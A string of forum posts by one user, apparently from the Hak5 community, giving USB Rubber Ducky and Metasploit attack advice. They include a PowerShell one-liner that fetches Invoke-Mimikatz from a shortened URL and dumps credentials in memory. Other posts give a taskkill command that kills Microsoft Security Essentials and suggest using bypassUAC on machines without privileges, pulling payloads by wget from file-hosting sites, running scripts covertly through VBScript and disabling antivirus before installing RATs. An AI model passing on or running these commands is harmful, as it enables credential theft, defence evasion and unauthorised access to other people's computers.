MB60893

Hmm. If you are using a command prompt, then I would recommend just storing the files in the path variable %USERPROFILE%. You can even change directories to this as well by cd %USERPROFILE% With regards to the other problems, try doing this first. Often you won't be able to do a lot of ducky things without finding a way to invoke UAC Privileges.

Well, that would call for building your own compiler to write scripts as beautifully simplistic as duckyscript, and even then you would need to make sure that your teensy was compatible with other systems. Just support Hak5 and use their ducks.

I am not sure about this. I recommend injecting a file through a java applet or something along those lines. Good Luck!

Nice. I really appreciate your help with this. Don't worry about me breaking any computer systems which I shouldn't be on. I am just demonstrating how you can exploit several venerabilities in systems with tools in memory. It is really a test which I am demonstrating.

EDIT ON POST: Is it possible to use the bypassUAC exploit on a machine with no privileges? I imagine not, but I need this to work. Any ideas?

Marvelous. I am new to metasploit and I have the framework edition. To run the meterpreter, do I need a linux based OS, or can I use Cygwin or some other terminal emulator to get things done on my windows machine? (I don't want to use the community edition if I can help it!) :)

Hi everyone, I have seen the PowerSploit script on how Mimikatz can be loaded entirely into memory and used to dump credentials, and I was thinking would it be possible to load a program from metasploit, like bypassuac, which would usually be detected by an antivirus program into memory and use it from there? This could give you admin access to just about anything. Sadly, my knowledge on how to do this is lacking. If anyone could help with this, it would be much appreciated! :) Cheers, MB60893

You could always use a VBScript to detect when the drive is there, then write the ducky drive letter to a .bat file. Then execute that Best thing is the VBScript won't be shown in any kind of console/terminal, so you are really going to make the script covert! EDIT: I see that a newer vbscript has been added with the same properties. Just use that and modify if you have any further troubles.

You are never going to be perfect with your antivirus detection and disabling techniques in any case. Your best bet is just to find a way of not triggering an AV.

Else just use CTRL ESC, or CONTROL ESCAPE, and that will bring up the Start Menu. Not a noobish thing to say at all, I got stuck with this myself for an extensive period of time! :P

Hi again Lavanoid, Check out PowerSploit and the section on Bypassing Antivirus. What this script does is it checks for a trace of an Antivirus, then the other programs kill the processes of the AV. Works great on my machines (quite extensive). Cheers, MB60893

Not yet. HOWEVER, you should check out PowerSploit, especially the section on AntiVirus. Basically, it is a powershell script which will pick up an antivirus signature, which can then be used to disable the antivirus that you have.

Trinity Rescue Toolkit. Really useful, especially if you put all of these boot CD's on a USB key. See project "USB Multipass" in Hak5 Forums.

I have had this problem recently myself. You can use something like SkyDrive, though. Make an account, and share the file with properties "Edit". No one unless they get the URL or can guess correctly out of the millions of combinations will be able to download the file. Give it a go. The link doesn't change either.

Cool Trick! You could even go a step further and write a script which keeps changing the click every few seconds!

Check This out: http://www.thingiverse.com/thing:194826. Someone in the Hak5 Forums designed this case, and you can specify a 3D printer to print in transparent colours. Fits the duck and you can get it printed from a place near you cheaply from: http://www.makexyz.com/3dprinters/.

Hi again Lavanoid, You can use this fantastic script which uses mimikatz, and it doesn't set off any antivirus. powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" You do need the administrative rights to run the powershell with this script, but it does work, and it won't make your AV go berserk because it uses Mimikatz from in memory, meaning no need for procdump as well!Give it a go! MB60893.

The thing about the duck is that it is acting as a USB Keyboard, so it is very hard for antivirus programs to detect. The thing that may make it not work is that the driver that is downloaded for the Ducky to work reads "HID - Human Interface Device". Aside from that, some keyboards come up with this, and they are not detected by any antivirus software. If you are trying to do miscellaneous things with the ducky, then certain antivirus programs may pick up the activity. The best thing to do is to start up a command prompt and disable the service or live monitoring processes of the antivirus program. For Microsoft Security Essentials, it is as simple as: "taskkill /f /im msseces.exe /t" For some other programs, it may be a matter of deleting a registry entry to stop it on startup. It is a good thing to watch out for when installing RATS and more.

Well if you can't count on it, then you might need to put up a delay up to a minute or so. It is something that we can't really predict, unless you manually install the driver off of a USB key, but that can also take time, and is generally slower than using the ducky. Sorry.

If you type "USB Rubber Ducky Repeat" into google, you get the Hak5 page which says Firmware V2.4 released, and "Added Repeat Command". This means that your duck must be less than V2.4. You should update the duck ASAP if you wish to do this duckyscript justice! :)

You are in luck. There is a tool in the Metasploit Framework which allows administrative access to be used. Only thing is that Microsoft security essentials recognises the bypassuac program as potentially malicious. An easy fix to this is to kill any monitoring security programs with the command line utility task "Taskkill /f /im msseces.exe /t" and that should make everything work great! Just do some research on your target machine and check what antivirus they have, then use a wget from powershell to download and use the application. Good luck with this, it sounds like a fantastic project and I can't wait to have a look at the duckyscript behind it!! :)

Just backing up about MediaFire and all other sites where you can download files etc, make sure you right click the button and copy the link address. If this doesn't work just inspect the button element and copy the URL.

While this is a good idea, I still only wish to modify the source code, hence why I am still leaving this thread as unsolved. Thanks everyone so far, but please keep these ideas coming!

You could always use the metasploit tool "BypassUAC". Works great and with a simple wget off of a service like MediaFire or DropBox, it is a no brainer. Just remember to disable pesky antivirus! :D

Hi, If you want to detect the drive, then I suggest doing what was done in Hak5 episode of Ducky Exfiltration (one of the earliest episodes of season 15) and create a drive with a name like ducky, so that it will be able to detect where the update software is, then it should run and get all the files off of the USB. Just modify your batch script to do this and you should be hunkey dorey! :) Cheers, MB60893.